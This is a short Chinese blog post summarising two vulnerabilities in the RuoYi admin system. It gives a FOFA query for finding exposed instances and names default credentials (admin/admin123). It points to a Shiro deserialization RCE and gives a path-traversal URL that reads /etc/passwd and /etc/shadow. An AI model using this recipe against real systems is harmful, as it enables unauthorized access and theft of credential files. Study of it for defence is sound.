若依(RuoYi)管理系统漏洞总结

发布于 2021-04-05 02:16

漏洞背景

若依管理系统是基于SpringBoot的权限管理系统,

1.早期版本有反序列化漏洞 执行任意命令

漏洞复现

祭出fofa大法,fofa语法如下

app="若依-管理系统" && body="admin"

利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap 

利用poc执行任意命令

2后台登录后可以任意读取文件

登陆后访问  (默认弱口令 admin admin123) 

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

读取 passwd

其他目录读取etc/shadow

第一个准确来说是属于Apache Shiro下的漏洞,第二个才是Ruoyi真正的漏洞,不过遇到RuoYi的都可以先考虑下第一个漏洞试试。

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考

本文来自网络或网友投稿,如有侵犯您的权益,请发邮件至:aisoutu@outlook.com 我们将第一时间删除。

相关素材